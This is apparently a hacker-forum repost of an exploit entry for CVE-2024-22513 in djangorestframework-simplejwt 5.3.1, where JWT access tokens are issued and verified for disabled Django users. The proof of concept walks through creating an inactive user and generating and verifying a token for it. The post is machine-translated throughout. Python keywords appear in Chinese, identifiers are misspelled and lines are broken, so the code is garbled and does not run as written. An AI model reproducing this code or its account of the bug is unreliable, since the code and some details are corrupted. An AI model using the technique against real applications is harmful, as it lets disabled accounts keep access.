H

djangorestframework -simplejwt 5.3.1-信息披露

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: djangorestframework -simplejwt 5.3.1-信息披露
#日期: 26/01/2024
#利用作者: Dhrumil Mistry(DMDHRUMILMETICY)
#供应商homepage3360 https://github.com/jazzband/djangorestframework-simplejwt/
#软件link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1
#版本:=5.3.1
#在: MacOS上测试
#CVE : CVE-2024-22513
#djangorestframework-simplejwt的版本最高为5.3.1。
#这个漏洞有可能引起各种安全问题,
#包括业务对象级授权(BOLA),业务功能
#级别授权(BFLA),信息披露等。
#来自用户甚至可以访问Web应用程序资源的事实
#在他们的帐户被禁用后,主要是由于缺乏适当的
#用户验证检查。
#如果程序员使用使用
“访问”
#class和for_user方法然后返回JWT令牌,可以
被用于
#在Django和Django Rest Framework应用程序上进行身份验证。
#使用以下命令:开始Django shell
#python manage.py shell
#------------------------------------------------------------
#创建非活动用户并为用户生成令牌
来自django.contrib.auth.models导入用户
来自REST_FRAMEWORK_SIMPLEJWT.TOKENS导入访问
#创建非活动用户
inatevive_user_id=user.objects.create_user('testuser',
'[email protected]','testpassw0rd!',is_Active=false).id
#Django应用程序程序员为无活动用户生成令牌
accessToken.for_user(user.objects.get(id=inatevive_user_id))#错误
由于用户不活跃,应该提高
#Django应用程序验证用户令牌
accessToken.for_user(user.objects.get(id=inatevive_user_id)).verify()#
在验证非活动用户令牌期间没有例外
 
后退
顶部